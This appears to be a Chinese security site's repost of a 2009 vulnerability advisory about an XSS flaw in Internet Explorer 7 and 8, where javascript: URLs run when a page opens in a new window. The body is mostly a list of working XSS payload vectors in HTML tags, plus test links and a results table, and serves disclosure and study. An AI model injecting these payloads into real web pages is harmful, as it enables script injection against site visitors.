为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

Multiple Exploiting IE8/IE7 XSS Vulnerability

2009-6-22 10:59| 投稿: security

摘要:   Multiple Exploiting IE8/IE7 XSS Vulnerability  Author: www.80vul.com [Email:5up3rh3i#gmail.com]  R...
  Multiple Exploiting IE8/IE7 XSS Vulnerability  Author: www.80vul.com [Email:5up3rh3i#gmail.com]  Release Date: 2009/06/22  References:http://www.80vul.com/ie8/Multiple%20Exploiting%20IE8IE7%20XSS%20Vulnerability.txt  Overview:  Tags[not include <IFRAME>] in ie7/8 are don't allowe to run "javascript:[jscodz]",but  we found them allowed ro run where open it in new target.  like this url:  http://www.80vul.com/test/ie8-1.htm  ie8-1.htm's codz :  <STYLE>@import 'javascript:alert("xss1")';</STYLE>  <IMG SRC=javascript:alert('XSS2')>  <BODY BACKGROUND="javascript:alert('XSS3')">  <LINK REL="stylesheet" HREF="javascript:alert('XSS4');">  <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');">  <IFRAME SRC="javascript:alert('XSS6');"></IFRAME>  <DIV STYLE="background-image: url(javascript:alert('XSS7'))">  <STYLE>.XSS{background-image:url("javascript:alert('XSS8')");}</STYLE><A CLASS=XSS></A>  <STYLE type="text/css">BODY{background:url("javascript:alert('XSS9')")}</STYLE>  <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS10')></OBJECT>  <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>  <script SRC="javascript:alert('xss11');"></script>  <video SRC="javascript:alert('xss12');"</video>  <LAYER SRC="javascript:alert('xss13')"></LAYER>  <embed src="javascript:alert('xss14')" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed>  <applet src="javascript:alert('xss15')" type=text/html>  when visite this url by ie7/8, <IFRAME SRC="javascript:alert('XSS6');"></IFRAME> this is runing, but other aren't to run.  but, where open ie8-1.htm in new target[like this :<a href= target="_blank"> and <iframe> and window.open in <sript> ... etc.] ,so test this codz in my localhost:  <a href="http://www.80vul.com/test/ie8-1.htm" target="_blank">go</a>  [PS: <a href="gohttp://www.80vul.com/test/ie8-1.htm">go</a> don't work]  of couse this codz:  <iframe src="http://www.80vul.com/test/ie8s.htm"></iframe>  and this codz:  <script>window.open("http://www.80vul.com/test/ie8-1.htm");</script>  ........[testing].......  So the results is :  ---------------------------------------------------------  IE |  alert  ---------------------------------------------------------  ie7: xss4/xss3/xss2/xss1/xss8/xss/xss11/xss7/xss6/xss9  ------------------------------------------------------  ie8: xss4/xss1/xss11/xss6  ---------------------------------------------------------  Disclosure Timeline:  2009/05/01 - Found this Vulnerability  2009/06/22 - Public Disclosure  Greeting:  ycosxhackhttp://hi.baidu.com/ycosxhack],Not his test,not this Vulnerability.

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部